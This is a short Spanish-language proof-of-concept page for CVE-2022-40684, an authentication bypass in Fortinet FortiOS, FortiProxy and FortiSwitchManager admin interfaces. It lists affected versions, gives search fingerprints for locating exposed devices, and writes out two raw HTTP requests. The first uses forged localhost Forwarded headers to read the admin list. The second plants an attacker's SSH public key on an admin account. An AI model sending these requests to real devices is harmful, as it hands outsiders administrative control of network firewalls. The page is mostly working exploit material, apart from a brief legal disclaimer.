
PoC y exploit para CVE-2022-40684, un bypass de autenticación en las interfaces de administración de Fortinet FortiOS, FortiProxy y FortiSwitchManager, permitiendo acceso de administrador no autorizado mediante solicitudes HTTP manipuladas.
Cualquier persona u organización que utilice la red debe cumplir con la Constitución y las leyes, observar el orden público y respetar la moral social. No se debe poner en peligro la seguridad de la red, ni utilizar la red para realizar actividades que atenten contra la seguridad, el honor o los intereses nacionales.
Fortinet es un proveedor de renombre mundial de productos de seguridad de red y soluciones de seguridad. Sus productos incluyen cortafuegos, software antivirus, sistemas de prevención de intrusiones y componentes de seguridad de terminales. En la interfaz de administración de los productos FortiOS, FortiProxy y FortiSwitchManager afectados, es posible omitir la autenticación utilizando una ruta o canal alternativo, y operar la interfaz de administración a través de solicitudes HTTP o HTTPS especialmente diseñadas sin autenticación.
Alto
FortiOS versión 7.2.0 - 7.2.1
FortiOS versión 7.0.0 - 7.0.6
FortiProxy versión 7.2.0
FortiProxy versión 7.0.0 - 7.0.6
FortiSwitchManager versión 7.2.0
FortiSwitchManager versión 7.0.0
title="FortiProxy"
title="FortiGate"

GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

